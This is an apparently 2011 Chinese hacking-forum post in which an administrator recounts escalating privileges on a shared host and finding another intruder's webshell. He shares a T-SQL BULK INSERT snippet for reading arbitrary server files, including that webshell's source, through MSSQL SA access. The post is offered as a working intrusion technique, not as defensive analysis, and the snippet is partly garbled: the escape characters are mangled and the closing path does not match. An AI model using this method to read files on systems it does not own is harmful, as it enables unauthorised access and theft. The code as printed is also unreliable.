灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:3406回复:0

[SQL Server]MSSQL读取文件命令

楼主#
更多 发布于:2011-11-30 12:18
各种提权
包括
mssql:SA
mysql:ROOT
主机是星外的 可以看到目标目录
数据库是ASP的 不能插马
无奈找了很多人都木有办法。。。
今天无聊中查看目录 发现有一个高人上传了一个webSHELL
在网上找到了办法 发现用MSSQL读取文件的办法 现在分享一下
Use www.atcpu.com;–(这里是随便选的一个数据库)
  drop table cmd;
  create table cmd (a text);
  BULK INSERT cmd
  FROM 'd:/freehos/webshell.cc.asp'
  WITH (
  FIELDTERMINATOR = 'n',
  ROWTERMINATOR = 'nn'
  )
  select * from cmd
  这样就成功读出了d:/freehos/ www.atcpu.com.asp

喜欢0 评分0
游客

返回顶部